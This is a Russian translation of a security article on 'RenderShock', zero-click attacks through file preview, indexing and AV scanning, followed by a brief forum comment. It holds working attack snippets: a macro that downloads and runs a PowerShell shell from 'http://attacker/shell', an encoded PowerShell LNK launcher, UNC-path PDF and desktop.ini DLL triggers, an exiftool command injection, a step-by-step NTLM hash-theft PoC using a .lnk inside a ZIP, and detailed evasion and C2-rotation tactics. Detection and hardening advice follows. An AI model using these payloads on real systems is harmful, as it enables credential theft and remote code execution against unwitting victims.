RenderShock: Атаки без кликов на базе системных функций предпросмотра

RenderShock — это комплексная стратегия атак без кликов (zero-click), нацеленная на пассивные процессы предпросмотра файлов, индексации и автоматизации в современных операционных системах и корпоративных средах. Она использует встроенные механизмы доверия и фоновые процессы в файловых системах, почтовых клиентах, антивирусах и графических интерфейсах, чтобы доставлять вредоносные нагрузки без какого-либо взаимодействия пользователя.

В отличие от традиционного фишинга или кампаний, требующих действий жертвы, RenderShock применяет стандартные функции системы и автоматизации для выполнения операций — от разведки и кражи данных до получения учетных данных и удалённого выполнения кода. Логика атак встраивается в метаданные, триггеры предпросмотра и форматы документов, превращая удобство системы в незащищённый вектор атаки.

RenderShock — это модульная модель атаки, а не единичный эксплойт. Она включает:

• Полный kill chain: от разработки полезной нагрузки до постэксплуатации
• Payloads, использующие предпросмотр, индексаторы, антивирусные движки и рендереры
• Методы скрытности, включая полиглот-файлы, NTLM-утечки через UNC-пути и атаки на шрифтовые движки

Введение​

Современные ОС и корпоративные инструменты предлагают функции предпросмотра, авто-тегов, синхронизации и классификации без открытия файлов пользователем. Однако это создаёт пассивную поверхность атаки, остающуюся без надлежащего мониторинга.

RenderShock эксплуатирует именно такие пассивные точки активации, позволяя злоумышленнику получить доступ, украсть данные или закрепиться в системе без кликов и запуска файлов пользователем.

Поверхности выполнения​

Успех RenderShock основан на серии пассивных процессов, которые автоматически обрабатывают содержимое файлов без явных действий со стороны пользователя. Понимание того, как эти поверхности работают, критично как для эксплуатации, так и для защиты от подобных угроз.

Современные корпоративные системы созданы для удобства: они автоматически создают предпросмотр, индексируют, синхронизируют и рендерят файлы на рабочих станциях, в облаках и продуктивных платформах. Эти процессы обычно происходят без участия пользователя, при этом система доверяет рендерингу как безопасной операции. RenderShock использует это допущение, атакуя доверенные компоненты, которые тихо обрабатывают потенциально вредоносные файлы в фоне.

Ниже перечислены основные функции и службы, наиболее уязвимые к пассивной активации полезной нагрузки: обработчики предпросмотра документов, процессоры метаданных, клиенты синхронизации и индексаторы содержимого.

Подсистемы предпросмотра файлов​

Операционные системы предоставляют панели предпросмотра, которые автоматически отображают содержимое файлов при их выборе или наведении курсора в файловом менеджере. Эти рендереры обрабатывают данные в памяти, часто вызывая зарегистрированные обработчики предпросмотра.

• Панель предпросмотра Windows Explorer. Обрабатывает DOCX, XLSX, PDF, RTF, изображения и медиафайлы. Даже без открытия файла его выбор может запустить парсинг для предпросмотра.
• Quick Look в macOS. Предоставляет мгновенный предпросмотр файлов с использованием встроенных движков рендеринга. Предпросмотр может выполняться без ведома пользователя, например, при использовании Finder или поиска Spotlight.
• Предпросмотр Office в Windows. При наведении курсора или открытии предпросмотра документа Office в Outlook или Explorer могут активироваться встроенные элементы, включая макросы, ActiveX или удалённые шаблоны, в зависимости от конфигурации системы.

Почтовые клиенты и веб-рендереры​

Панели предпросмотра писем могут загружать вложения или встроенный контент в режиме только чтения. На неправильно настроенных системах могут выполняться встроенные скрипты, рендериться объекты ActiveX или загружаться удалённые медиафайлы.

• Outlook. Отображает RTF, HTML и DOC-вложения. Известно, что через него утекали NTLM-хэши (например, CVE-2023-23397).
• Thunderbird / Apple Mail. Могут рендерить вложенный удалённый контент или вложения без открытия пользователем.

Индексаторы метаданных и парсеры содержимого​

Службы индексирования файлов сканируют, извлекают и каталогизируют метаданные и содержимое документов в фоне. При этом могут вызываться обработчики предпросмотра и MIME-специфическая логика парсинга.

• Windows Search Indexer. Использует процессы SearchProtocolHost и SearchFilterHost для парсинга файлов и извлечения индексируемого контента.
• Spotlight в macOS. Генерирует предпросмотры и извлекает метаданные из файлов для поиска, тегов и смарт-папок.

Антивирусы, DLP и движки безопасности​

Антивирусные и DLP-продукты распаковывают файлы для сканирования содержимого, анализируя метаданные документов, заголовки изображений и скрипты в поисках угроз.

• RenderShock использует логику сканирования антивирусов, вставляя полезные нагрузки в форматы, которые выполняются или интерпретируются эмуляторами AV.
• Встроенные форматы файлов (например, .lnk, .hta, Office-документы с макросами) могут исполняться при глубоком сканировании.

Облачные клиенты синхронизации и сетевые шары​

• OneDrive, Dropbox, Google Drive. Автоматически скачивают и индексируют общие файлы. Эти загрузки могут запускать рендереры файлов, AV-сканы и извлечение метаданных.
• Файлы, помещённые в общие папки, могут парситься подключёнными конечными точками без явного взаимодействия.

Злоупотребление доверенными компонентами GUI​

RenderShock также атакует графические элементы, которые автоматически разрешают пути к файлам, загружают иконки или читают локализованные конфигурации:

• .LNK-файлы. Загружают иконки по UNC-путям. При просмотре папки с вредоносным .lnk Windows обращается к пути иконки, что может привести к утечке учётных данных.
• desktop.ini. Может подгружать иконки папок из удалённых DLL.
• SVG-файлы. Могут содержать встроенный JavaScript, вызывающий ошибки парсинга или активный контент при рендеринге.
• RTF-файлы. Могут включать вредоносные поля (INCLUDEPICTURE, инъекции буфера обмена), которые выполняются при предпросмотре.
• EXIF-метаданные. Метаданные изображений могут содержать фрагменты команд или поля, вызывающие сбои при парсинге.

Методология атаки​

RenderShock — это структурированная фреймворк-атака, разработанная для скрытности и модульности. Методология включает пять ключевых этапов.

Этап 1 – Проектирование полезной нагрузки​

RenderShock основан на принципе, что многие форматы файлов при пассивной обработке сервисами индексации, панелями предпросмотра или средствами безопасности могут вызвать выполнение кода или сетевые подключения без какого-либо действия пользователя.

Для эксплуатации этого эффекта payload’ы проектируются не для клика или ручного запуска, а для тихого выполнения при парсинге, предпросмотре или инспекции системой.

Чтобы охватить как часто встречающиеся ошибки конфигурации, так и новые пути эксплуатации, полезные нагрузки делятся на два уровня:

A. Базовые полезные нагрузки​

Известные, малозаметные примитивы. Эти форматы и типы нагрузок уже наблюдались в реальных атаках и на красных командах, но остаются эффективными из-за слабой политики защиты или отсутствия видимости при пассивной обработке файлов.

• PDF с внешними ссылками: Встраивание внешних изображений или шрифтов инициирует исходящие подключения (beaconing) или утечку NTLM-хэшей при парсинге preview-движками.
• DOCX/XLSM с макросами или удалёнными шаблонами: Неправильно настроенные Office-системы могут при предпросмотре в Outlook или Explorer разрешать удалённые шаблоны или авто-запуск макросов.
• LNK-файлы с UNC-путями иконок: Выбор папки с таким .lnk заставляет Windows Explorer загружать иконку по сетевому пути, инициируя NTLM-аутентификацию без открытия ярлыка.
• RTF с полями INCLUDEPICTURE или OLE: При предпросмотре такие поля могут тихо загружать удалённые ресурсы.
• Изображения с инъекцией EXIF-метаданных: JPEG или PNG могут содержать длинные строки или payload’ы в EXIF, приводящие к сбоям или ошибкам логики парсеров индексации и сканеров.
• ZIP/ISO с вредоносными ярлыками: Комбинирование .lnk, .desktop или Office-документов с макросами внутри ISO может обходить сканеры вложений и активироваться при авто-распаковке или генерации превью.

Примечание: Формат ZIP/ISO может относиться как к базовому, так и к продвинутому уровню в зависимости от упаковки. Например, простое .lnk в ZIP — низкая сложность, но .lnk с ADS-стримами или ISO-байпасом уже становится продвинутой, скрытной угрозой.

B. Продвинутые полезные нагрузки​

RenderShock также использует нетрадиционные, минимально задокументированные техники payload’ов, имитирующие мышление adversary zero-day. Эти методы выходят за рамки стандартной тактики, эксплуатируя edge-case поведения preview-движков и индексации.

• Полиглот-файлы: Файлы, валидные сразу для нескольких парсеров (например, PNG+HTML или DOCX+ZIP), обходят MIME-фильтрацию и путают сканеры, сохраняя при этом вредоносную логику.
• Инъекция удалённых шаблонов без макросов: В Microsoft WordprocessingML Target-атрибут может указывать на внешний .dotx или OLE-объект, загружаемый при предпросмотре без запуска макроса.
• TTF/WOFF-эксплойты: Кастомные шрифты, подгружаемые preview-движками PDF или DOCX, могут эксплуатировать баги парсеров шрифтов, вызывая silent memory corruption или logic errors.
• CHM или .library-ms payload’ы: Эти форматы могут выполняться или инициировать NTLM-аутентификацию при наведении или индексации (Explorer, Office preview handlers).
• Отравленные ICC color profiles: Некорректные или огромные ICC-профили в изображениях могут крэшить Quick Look (macOS), Windows Photo Viewer или indexing engines.
• Alternate Data Streams / Resource Fork Abuse: В NTFS (Windows) или macOS можно в ADS или .AppleDouble-forks встраивать скрипты или loader-stubs, которые парсятся при создании превью или синхронизации.
• Container-based bypass payloads: ISO/VHD с desktop.ini, autorun.inf и зашифрованными .lnk или исполняемыми файлами обходят Mark-of-the-Web и могут выполняться при авто-маунте или индексации.
• Office Add-Ins и ActionPane Injection: DOCM или XLSM могут содержать встроенные COM add-ins или ActionPane controls, которые исполняются при предпросмотре в уязвимых Office-конфигурациях.

Этап 2 – Механизмы доставки​

Доставка RenderShock не требует действий пользователя. Файлы размещаются там, где системы будут их обрабатывать автоматически:

• Загрузки на helpdesk-порталы: preview агента или системы тикетов.
• Вложения на общих email-ящиках: AV или preview-движки обрабатывают при получении.
• USB-дропы: сценарии plug-and-preview при просмотре содержимого флешки.
• Внутренние file shares: размещение файлов в расшаренных папках, которые индексируются или просматриваются целевыми системами.

Также RenderShock использует интеграции с SaaS и облачными платформами. Например, файлы, загруженные в approval workflows Google Workspace, Microsoft 365, Zendesk, Freshdesk, часто рендерятся preview-движками API. Публичные репозитории документов могут инициировать разрешение удалённых ресурсов при краулинге, создавая stealth recon beacons без прямого таргетинга.

Этап 3 – Активация триггера​

Атака активируется, как только система взаимодействует с файлом:

• Выбор файла в Explorer запускает предпросмотр.
• Антивирусное сканирование инициирует парсеры.
• Почтовый клиент генерирует preview.
• Сервисы индексации извлекают метаданные или создают thumbnails.
• Quick Look на macOS автоматически генерирует превью.

Этап 4 – Эффекты полезной нагрузки​

Разные payload’ы достигают разных целей:

• Пассивная разведка:
  • DNS/HTTP beaconing при предпросмотре документа.
  • NTLM-аутентификация на SMB share атакующего.
  • Сбор hostname, username, IP, domain, OS fingerprinting.
• Кража учётных данных:
  • Сбор NTLMv2-хэшей через UNC-пути в документах или ярлыках.
• Удалённое выполнение кода:
  • Макросы Office, .lnk-скрипты, ActiveX, или buffer overflows в preview-компонентах.
• Отказ в обслуживании (DoS):
  • Крэши Spotlight или SearchIndexer через malformed EXIF или повреждённые структуры файлов.
• Закрепление в системе (Persistence):
  • Размещение .desktop или LaunchAgents в автозагрузочных директориях.

Этап 5 – Латеральное перемещение и постэксплуатация​

После получения доступа:

• Использование собранных учётных данных для пивота.
• Деплой implant’ов через доверенные внутренние порталы.
• Таргетинг индексации и shared systems для повторной атаки на другие машины.

Цепочка атаки​

Модель атаки RenderShock следует модифицированной кибер kill chain, отражая пассивное выполнение и компрометацию системой, а не действиями пользователя. Ниже представлен пошаговый поток атаки.

1. Разведка​

• Определение точек загрузки файлов (support inbox, HR-формы, helpdesk-порталы, общие папки).
• Перечисление допустимых типов файлов и поведения security-стека (вендоры AV, ПО предпросмотра, политики индексации).

2. Вооружение​

• Создание вредоносного документа/изображения/ярлыка, который вызовет пассивный парсинг или предпросмотр.
• Встраивание триггеров, например:
  • UNC-пути к SMB-серверу атакующего (для утечки NTLM)
  • Макросы, активирующиеся через preview pane
  • Некорректные EXIF или метаданные (для крэша/выполнения кода AV, Quick Look, Spotlight)

3. Доставка ​

Загрузка файла в:

• Общие облачные диски (OneDrive, Dropbox)
• Публичные системы тикетов (например, Zendesk)
• Общие почтовые ящики (например, HR@, invoices@)
• Физический USB-дроп (например, в лобби или на выставке)

4. Эксплуатация – Пассивный триггер​

• Система жертвы просматривает, индексирует или сканирует файл без взаимодействия пользователя.
• Срабатывание триггера:
  • Предпросмотр файла активирует макрос или PowerShell
  • SMB-запрос утечет NTLM-хэш
  • AV-сканирование отравленных EXIF приводит к крэшу или выполнению кода

5. Установка ​

• Reverse shell payload загружается через макрос предпросмотра.
• Настройка закрепления в системе:
  • .desktop или .lnk в папке автозагрузки
  • Конфигурация LaunchAgent или задача планировщика

6. Командование и контроль​

• Beacon через HTTP, DNS или PowerShell на удалённый C2.
• Использование легитимных сервисов (Dropbox API, GitHub) для маскировки трафика.

7. Достижение целей​

• Релеяция захваченных учётных данных для латерального перемещения.
• Перечисление доменных и сетевых активов.
• Экcфильтрация метаданных, локальных документов и содержимого буфера обмена.
• Опционально: уничтожение сервисов предпросмотра/индексации для затруднения обнаружения.

Примеры цепочек​

PDF SMB Beacon (Разведка / Утечка NTLM)​

from fpdf import FPDF
pdf = FPDF()
pdf.add_page()
pdf.image(“\\\\attacker\image.jpg”, x=10, y=8)
pdf.output(“recon.pdf”)
Listener (Responder):
sudo responder -I eth0 -wrf

Excel Macro Reverse Shell​

Private Sub Workbook_Open()
Shell “powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(‘http://attacker/shell’)”, vbHide
End Sub

LNK Payload для запуска PowerShell​

cmd.exe /c powershell -nop -w hidden -e [Base64Payload]

desktop.ini Icon DLL Trigger​

[.ShellClassInfo]
IconResource=\\attacker\icons\malicious.dll,0

Отравление метаданных JPEG (JPEG Metadata Poisoning)​

Использовать exiftool для инъекции команды:

exiftool -Comment=’powershell -nop -w hidden -c iex(iwr http://attacker/shell.ps1)’ image.jpg

Пассивная эксфильтрация NTLM-хэшей через .lnk в ZIP​

RenderShock Proof-of-Concept — Пассивная эксфильтрация NTLM-хэшей через .lnk в ZIP​

Этот Proof-of-Concept демонстрирует креативное использование поведения рендеринга файлов Windows для запуска исходящей аутентификации без открытия файла. Специально созданный .lnk-файл, помещенный в архив .zip и просмотренный в Windows Explorer, заставляет систему молча попытаться получить удаленную иконку через SMB. Это взаимодействие инициируется системой, а не пользователем.

1. Настройка атакующего​

Система: Kali Linux (или любой Linux-хост)

Используемый инструмент: Responder — rogue SMB-сервер для перехвата попыток NTLM-аутентификации.

Kali Responder setup

Responder теперь будет отслеживать запросы SMB-аутентификации на порту 445.

2. Создание Payload-а — .lnk-файл с удаленной иконкой​

На целевой Windows-системе (или симулированной жертве):

1. ПКМ на Рабочем столе → Создать > Ярлык (Right-click the Desktop → New > Shortcut)

При запросе местоположения или бинарника укажи любой локальный исполняемый файл.

lnk creation

1. Назови ярлык чем-то безобидным, например: Q3-Financials.lnk
2. ПКМ по ярлыку → Свойства (Properties)
3. Нажми Сменить значок… (Change Icon…) (см. Figure 4)
4. В поле иконки введи:
   Пример: \\<KALI_IP>\icon.ico

SMB setup

1. Нажми OK → Применить → Закрыть (Apply → Close)

На этом этапе Windows попытается загрузить иконку и молча инициирует SMB-подключение к атакующему.

3. Метод доставки — Встраивание в ZIP-архив​

После создания .lnk-файла:

1. ПКМ по .lnk → Отправить > Сжатая ZIP-папка (Send to > Compressed (zipped) folder)
2. При необходимости переименуй архив во что-то безобидное, например:

Zip file delivery

Теперь этот ZIP — твой вектор доставки.

4. Триггер выполнения — Предпросмотр ZIP в Explorer​

Когда целевой пользователь:

• Открывает .zip в Windows File Explorer
• Или включает панель предпросмотра (Alt+P)

lnk execution

Как только .lnk внутри архива выбирается или подсвечивается, система пытается отрендерить иконку, разрешая удаленный UNC-путь. Это происходит даже если файл никогда не открывался и не запускался.

В реальных сценариях фишинга или латерального перемещения это часто первая стадия атаки, где любопытство или случайный предпросмотр инициируют утечку.

5. Результат для атакующего​

Если сетевое подключение успешно и исходящий SMB разрешен, Responder регистрирует попытку аутентификации:

SMB response

Это валидный NTLMv2 challenge-response хэш, который можно оффлайн-взломать с помощью hashcat или релейнуть для lateral movement через pass-the-hash.

Это происходит без выполнения кода, без предупреждений и без двойного клика по ярлыку.

Рекомендации для построения защиты​

• Блокировать исходящий SMB (порт 445) к недоверенным сетям
• Удалять .lnk-файлы из ZIP-архивов, полученных по почте
• Мониторить попытки NTLM-аутентификации к IP-адресам вне домена
• Аудировать поведение панели предпросмотра Windows в чувствительных средах

Практические соображения​

• В некоторых системах разрешение иконок внутри предпросмотра ZIP может кэшироваться или блокироваться политиками
• Для надежного тестирования сбрасывай .lnk-файл, меняй его имя или используй чистую VM snapshot
• Эта техника соответствует историческим атакам (например, APT-кампании с встраиванием .lnk в ZIP для кражи хэшей)

Оценка взаимодействия​

RenderShock открывает широкий спектр потенциальных последствий в зависимости от целей атакующего и уровня сложности payload-ов.

Разведка и сбор информации​

• Перечень пользователей и хостов:
  Пассивные маяки (beacons) собирают имена пользователей, имена хостов и доменные имена через попытки SMB-аутентификации.
• Определение операционной системы:
  Движки предпросмотра и инструменты индексирования часто добавляют заголовки или проявляют поведение, позволяющее определить версию ОС.
• Картирование сети:
  DNS-запросы или SMB-обращения могут раскрывать структуру внутренней сети, включая соглашения об именовании, диапазоны подсетей и шлюзы.

Кража учетных данных и релей​

• Сбор NTLMv2-хэшей:
  Триггеринг SMB-обращений через предпросмотр содержимого (PDF, LNK, DOCX) позволяет атакующим захватывать NTLMv2 challenge-response, которые можно взломать оффлайн или релейнуть.
• Атаки с релеем хэшей:
  Инструменты вроде NTLMRelayX позволяют пересылать NTLM-аутентификацию на другие внутренние сервисы, получая доступ без взлома хэшей.

Удаленное выполнение кода​

• Выполнение макросов при предпросмотре:
  В неправильно сконфигурированных средах документы Office с внедренными макросами могут выполняться при предпросмотре, обеспечивая RCE.
• LNK + PowerShell:
  Вредоносные LNK-файлы могут запускать PowerShell-реверсшеллы в закодированном виде.
• Загрузка DLL через desktop.ini:
  Удаленные DLL могут загружаться при просмотре директорий в Explorer.

Кроме макросов и ярлыков, RenderShock использует техники без макросов, такие как инъекция удаленного шаблона (remote template injection) в предпросмотр Office. Указав внешний DOTX или OLE-объект в WordprocessingML, атакующий может незаметно загрузить удаленное содержимое во время рендеринга предпросмотра. Этот метод обходит традиционное обнаружение макросов и может обеспечить выполнение кода или отправку beacon-ов при небезопасной конфигурации Office Preview.

Нарушение работы системы и DoS​

• Краш движков индексирования:
  Некорректно сформированные файлы или отравленные метаданные могут вызвать сбой Spotlight или Windows Search.
• Истощение памяти:
  Рекурсивные архивы или большие поврежденные EXIF-поля могут привести к исчерпанию RAM при сканировании или предпросмотре.

Закрепление и латеральное перемещение​

• Персистентность через конфигурацию:
  Размещение файлов .desktop, LaunchAgent или autorun.inf в путях автозагрузки.
• Запланированная разведка через общие папки:
  Вредоносные файлы в общих папках могут периодически индексироваться автоматически, обеспечивая долгосрочную передачу beacon-ов.

Стратегии обхода обнаружения​

RenderShock разработан для скрытной работы. Ниже описаны методы, с помощью которых он избегает обнаружения на различных уровнях защиты:

Обход на сетевом уровне​

• Используется SMB beaconing через TCP 445, что может сливаться с разрешенным внутренним трафиком.
• Применяется скрытый DNS-туннелинг или короткие TTL-записи для recon-beacon-ов (например, hostname.domain.attacker[.]com).
• Beacon-ы с временным ограничением (например, срабатывают только с 2 до 4 часов ночи), чтобы избежать срабатывания уведомлений в реальном времени.

Обфускация форматов файлов​

• Используются polyglot-файлы (например, PDF + ZIP), чтобы запутать сканеры.
• Payload-ы кодируются в EXIF-метаданных или XML-частях Office-документов.
• Злонамеренные строки макросов разбиваются с использованием Chr() или Base64 + split() в VBA.

Избежание сигнатур в статическом анализе​

• Исключаются традиционные индикаторы вредоносных программ (например, известные IP/домен, ссылки на calc.exe, cmd.exe).
• Переименовываются функции, рандомизируются переменные макросов, избегаются триггеры sandbox (например, короткие циклы).
• Используются документные шаблоны с легитимным видом, включая логотипы компаний и настоящие шрифты.

Обход анализа поведения со стороны AV/EDR​

• Payload-ы внедряются в части файлов, которые редко сканируются (например, Comments, DocumentProperties, EXIF MakerNotes).
• Триггерятся через немониторируемые процессы (например, SMB-запросы от explorer.exe, краш searchindexer.exe).
• Выполнение payload-ов откладывается (например, Start-Sleep в PowerShell) или запускается через запланированный реверсшелл.

Обход sandbox и движков предпросмотра​

• Вставляется логика для проверки sandbox (например, малый объем диска, короткое время работы системы).
• Используются payload-ы, зависящие от окружения:
  • Не выполняются, если hostname = sandbox или user = admin.
  • Beacon срабатывает только при совпадении имени домена с целевой организацией.

Операционная гигиена​

• Для скачивания реверсшеллов используется TLS с пиннингом сертификатов или проверкой отпечатка C2.
• Домен и C2 ротация каждые 48 часов с использованием DGA или DDNS.
• Payload-ы загружаются заранее в облачные хранилища (например, приватные репозитории GitHub или S3-бакеты).

Соображения по обнаружению и мониторингу​

RenderShock разработан для скрытной работы, однако защитники всё ещё могут выявить аномалии поведения при целенаправленном мониторинге.

Мониторинг процессов​

• Отслеживайте нетипичную активность процессов explorer.exe, winword.exe или searchindexer.exe, особенно при обращении к UNC-путям.
• Используйте Sysmon для логирования создания процессов и сетевых подключений из GUI-компонентов или служб индексирования.

Мониторинг сети​

• Выявляйте SMB, DNS или HTTP-запросы к неизвестным доменам или внешним IP, особенно если они исходят от процессов предпросмотра файлов.
• Коррелируйте эти исходящие запросы с последними файловыми событиями (например, получением email или синхронизацией документов).

Анализ содержимого файлов​

• Сканиpуйте документы на наличие ссылок на внешние URL, UNC-пути или внедрённых скриптов.
• Помечайте файлы с скрытыми макросами, чрезмерными EXIF-метаданными или неочевидными MIME-структурами.

Защита и реагирование на конечных точках​

Настройте правила EDR для оповещения при:

• Запросах в сеть из explorer.exe
• Доступе Office-приложений к внешним ресурсам при открытии или предпросмотре файлов
• Выполнении PowerShell, cmd или mshta, инициированном процессами GUI

Также:

• Мониторьте кросс-процессные сетевые вызовы:
  • Анализируйте SMB-запросы, HTTP-подключения или DNS-запросы, которые исходят от процессов, связанных с предпросмотром (например, explorer.exe, searchfilterhost.exe, quicklookd), а не от браузеров или почтовых клиентов.

Использование honeyfile и canary-файлов​

• Размещайте документы-приманки или LNK-файлы с внедрёнными beacon-URL в сетевых шарах.
• Отслеживайте callbacks от этих beacon-ов для выявления сканирования и предпросмотра файлов с заражённых систем.

Данная многоуровневая деградация обнаружения показана на Detection Visibility Stack, где иллюстрируется, как видимость атакующего уменьшается при смещении триггеров с взаимодействия пользователя на системный парсинг.

Примеры эксплуатации​

RenderShock основан на реальных действиях атакующих и эксплойтах, подтверждающих возможность и опасность нулевых кликов и пассивных полезных нагрузок. Хотя фреймворк RenderShock обобщает и расширяет эти техники, несколько кампаний APT и операции red team продемонстрировали элементы данной методологии на практике:

Threat Actor / Event (Актор / Событие)	Technique Used (Использованная техника)	Alignment with RenderShock (Связь с RenderShock)
APT28 (Forest Blizzard)	Использовали напоминания Outlook с UNC-путями (CVE-2023-23397) для утечки NTLM-хэшей без кликов пользователя.	Подтверждает возможность утечек NTLM через UNC при пассивном рендеринге документов.
APT-группы (не раскрыты)	Использовали .library-ms в ZIP для триггера NTLM-beacon при предпросмотре в Explorer (CVE-2025-24054).	Подтверждает стратегию RenderShock с LNK/shortcut SMB beacon.
Фишинг, нацеленный на Украину (CVE-2024-43451)	.url-файлы вызывали утечку учетных данных при предпросмотре или наведении.	Демонстрирует, что пассивный предпросмотр может инициировать принудительную аутентификацию.
Наблюдения Darktrace red team	.scf-файлы на сетевых шарах вызывали NTLM-beacon через загрузку иконок в Explorer.	Подтверждает логику RenderShock с desktop.ini и .lnk.
Check Point/Triskele (CVE-2025-30386)	Эксплойт Office Preview Pane привел к RCE без открытия документа.	Зеркалирует использование RenderShock предпросмотра Office для выполнения.
Эксплойты macOS Quick Look (CVE-2024-44236)	Специальные изображения с ICC/EXIF вызывали сбои предпросмотра или выполнение кода.	Подтверждает концепцию отравления метаданных и payload через изображения.
Злоупотребление AV-движками (CVE-2017-8541)	Вредоносный код выполнялся при сканировании AV (без открытия файла).	Подкрепляет RenderShock, использующий AV/DLP сканирование как триггер.

MITRE FRAMEWORK​

Tactic (Тактика)	ID	Technique (Техника)
Initial Access	T1203	Exploitation for Client Execution (через пассивный рендеринг вредоносных файлов)
Execution	T1059.001	Command and Scripting Interpreter: PowerShell
	T1204.002	User Execution: Malicious File (триггер при предпросмотре, а не при клике)
Credential Access	T1187	Forced Authentication (через UNC в предпросмотренных документах или LNK)
	T1557.001	Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning и SMB Relay
Discovery	T1016	System Network Configuration Discovery (через пассивный beacon)
	T1082	System Information Discovery (recon host/user при предпросмотре)
Persistence	T1547.009	Shortcut Modification (.LNK или desktop.ini для автозапуска)
	T1037.001	Boot or Logon Initialization Scripts: Logon Script (например, LaunchAgents)
Lateral Movement	T1021.002	Remote Services: SMB/Windows Admin Shares (с использованием украденных учетных данных)
Collection	T1005	Data from Local System (сбор метаданных или инъекция clipboard)
Command and control	T1055.013	Process Injection: PowerShell (для доставки reverse shell)
	T1071.001	Application Layer Protocol: Web (HTTP/S beaconing и транспорт reverse shell)
Impact	T1499.004	Endpoint Denial of Service: Application or Service Crash (сбой при предпросмотре)

​

Рекомендации​

RenderShock эффективен, так как использует системные функции по их прямому назначению. Предотвращение этих атак требует изменений в конфигурации, мониторинга поведения и архитектурных контролей.

Стратегические рекомендации​

• Пересмотрите границы доверия: относитесь к предпросмотрам, синхронизации и индексированию как к потенциальным поверхностям выполнения, а не только к инструментам продуктивности.
• Защищённая инфраструктура обработки файлов: стройте пайплайны предпросмотра и обработки файлов в изолированных sandbox, сегментированных и мониторируемых.
• Имитация пассивных атак в тестах: интегрируйте RenderShock-техники в регулярные red team упражнения и tabletop-сценарии.

Архитектурно RenderShock показывает, что движки предпросмотра и индексирования должны рассматриваться как интерпретаторы кода, а не простые рендереры. Вся обработка документов должна происходить в усиленных, изолированных микросервисах без доступа в сеть. Это существенно снижает риск компрометации без кликов.

Тактические рекомендации​

• Отключите функции предпросмотра:
  • Отключите Preview Pane в Windows Explorer через Group Policy.
  • Отключите Quick Look или ограничьте сторонние плагины в macOS.
• Ограничьте исходящий трафик:
  • Заблокируйте SMB (TCP 445) в интернет за исключением разрешённых сервисов.
  • Направляйте DNS через внутренние резолверы с оповещением о запросах с высокой энтропией.
• Ужесточите конфигурации Office и Viewer:
  • Включите блокировку макросов через GPO или M365.
  • Отключите автоматическую загрузку удалённых шаблонов в Office.
• Контроль загрузки файлов:
  • Санитизируйте все загруженные файлы через CDR или sandbox перед предпросмотром.
  • Удаляйте метаданные и внедрённые ссылки в PDF, DOCX и изображениях.

Оперативные рекомендации​

• Мониторинг поведения:
  • Настройте оповещения при сетевых вызовах из процессов предпросмотра.
  • Фиксируйте повторяющиеся сбои процессов предпросмотра и индексирования.
• Проактивная защита с deception:
  • Размещайте фальшивые LNK и desktop.ini, подключающиеся к canary-доменам.
  • Используйте фальшивые шары или файлы для имитации beacon-ов и обнаружения разведки.
• Обучение SOC и плейбуки:
  • Обучите аналитиков сценариям компрометации без кликов.
  • Обновите IR-плейбуки с учётом пассивных триггеров.

Заключение​

RenderShock меняет взгляд на файловые атаки: они происходят не из-за эксплуатации уязвимостей кода, а как следствие доверенного системного поведения. Современные вычислительные среды, чтобы быть удобными, нередко создают пути скрытого выполнения без взаимодействия пользователя. Злоупотребляя предпросмотром файлов, индексированием, синхронизацией и GUI-функциями, атакующие могут получить глубокую видимость среды и компрометировать её, просто доставив файл, который никогда не будет открыт.

Сила RenderShock в том, что он превращает безобидную автоматизацию – предпросмотр, синхронизацию, рендеринг – в начало kill chain, оставаясь при этом невидимым для большинства инструментов обнаружения. Именно это делает его таким опасным и сложным для выявления.

Организации должны исходить из предположения, что любой файл, попадающий в их экосистему, может инициировать цепочку действий до открытия. Защитникам необходимо тщательно проверять, как файлы парсятся, логируются, рендерятся и просматриваются, и внедрять контроллинг, который будет рассматривать пассивную обработку с той же строгостью, что и исполняемый контент.
Устраняя эти часто игнорируемые пробелы, компании смогут закрыть дверь для злоупотребления нулевыми кликами и автоматизацией.


Немного топорный перевод этой статьи

 

[Sandor]

Помнится, ещё на XP бывало если в папке с картинками некоторые из файлов были повреждены и попытка открыть такую папку в Проводнике приводила к зависанию.
Проблемный файл приходилось находить методом перебора через Total Commander.